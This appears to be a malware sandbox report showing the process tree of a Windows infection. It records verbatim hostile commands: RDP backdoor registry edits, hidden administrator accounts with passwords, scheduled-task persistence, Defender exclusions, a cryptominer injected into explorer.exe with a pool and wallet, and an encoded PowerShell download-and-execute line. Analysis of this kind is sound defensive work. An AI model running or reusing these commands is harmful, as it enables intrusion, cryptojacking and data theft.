C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2120
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:2764
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2772
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵PID:2888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2920
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵PID:2976
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵PID:2916
-
C:\Windows\system32\net.exenet start rdpdr5⤵PID:2928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2936
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:2892
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:3028
-
C:\Windows\system32\net.exenet start TermService5⤵PID:2608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2448
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2532
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1616
-
-
-
C:\Users\Admin\AppData\Local\Temp\6879.exeC:\Users\Admin\AppData\Local\Temp\6879.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\6879.exe" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:2104
-
-
-
C:\Users\Admin\AppData\Local\Temp\6C80.exeC:\Users\Admin\AppData\Local\Temp\6C80.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:472
-
C:\Users\Admin\AppData\Local\Temp\76AE.exeC:\Users\Admin\AppData\Local\Temp\76AE.exe1⤵
- Executes dropped EXE
PID:1784 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\76AE.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3020 -
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"3⤵PID:2112
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"4⤵
- Creates scheduled task(s)
PID:2152
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"3⤵
- Loads dropped DLL
PID:2624 -
C:\Users\Admin\AppData\Local\Temp\services64.exeC:\Users\Admin\AppData\Local\Temp\services64.exe4⤵
- Executes dropped EXE
PID:2656 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2860 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
PID:3004 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"7⤵PID:1748
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=gulf.moneroocean.stream:10128 --user=43m2K5awHfSB4ZtTTJepVVjkWDTnExdqDaHKwv9thKTK9dZAJwzUACebcQnZqMPRLS4keNBn7ZVNdUxtCTCPAx7D43jcvdC --pass= --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7FF2.exeC:\Users\Admin\AppData\Local\Temp\7FF2.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2200 -
C:\Users\Admin\AppData\Local\Temp\mine.exe"C:\Users\Admin\AppData\Local\Temp\mine.exe"2⤵
- Executes dropped EXE
PID:2472 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\mine.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2204 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵PID:544
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"4⤵PID:2468
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"5⤵
- Creates scheduled task(s)
PID:2576
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\services32.exe"4⤵
- Loads dropped DLL
PID:2996 -
C:\Users\Admin\services32.exeC:\Users\Admin\services32.exe5⤵
- Executes dropped EXE
PID:1840 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3028 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵PID:2724
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵PID:2340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵PID:3032
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c taskkill /f /PID "2492"7⤵PID:2512
-
C:\Windows\system32\taskkill.exetaskkill /f /PID "2492"8⤵
- Kills process with taskkill
PID:2748
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"7⤵PID:1504
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "/sihost32"8⤵PID:2308
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2soft.exe"C:\Users\Admin\AppData\Local\Temp\2soft.exe"2⤵
- Executes dropped EXE
PID:2552 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\2soft.exe"3⤵PID:2100
-
C:\Windows\System32\cmd.exe"cmd" cmd /c taskkill /f /PID "1748"4⤵PID:988
-
C:\Windows\system32\taskkill.exetaskkill /f /PID "1748"5⤵
- Kills process with taskkill
PID:2072
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"4⤵PID:2976
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"5⤵
- Creates scheduled task(s)
PID:2760
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\86D6.exeC:\Users\Admin\AppData\Local\Temp\86D6.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:2288 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\86D6.exe"2⤵PID:3008
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:3056
-
-
-
C:\Users\Admin\AppData\Local\Temp\9374.exeC:\Users\Admin\AppData\Local\Temp\9374.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Ghasar4f5 /del1⤵PID:2616
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Ghasar4f5 /del2⤵PID:2968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del3⤵PID:3052
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 79KZSCaz /add1⤵PID:2060
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 79KZSCaz /add2⤵PID:2140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 79KZSCaz /add3⤵PID:2160
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:2796
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:2192
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:2232
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD1⤵PID:2312
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD2⤵PID:2032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD3⤵PID:2676
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:2664
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:2652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:2256
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 79KZSCaz1⤵PID:1124
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 79KZSCaz2⤵PID:1776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 79KZSCaz3⤵PID:2984
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:2080
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:3056
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1700
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {320A2FDB-ACE3-4454-A007-A86864468DFA} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1788
-
C:\Users\Admin\AppData\Roaming\avvfhbwC:\Users\Admin\AppData\Roaming\avvfhbw2⤵
- Executes dropped EXE
PID:2428
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Account Manipulation
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Modify Registry
2Virtualization/Sandbox Evasion
1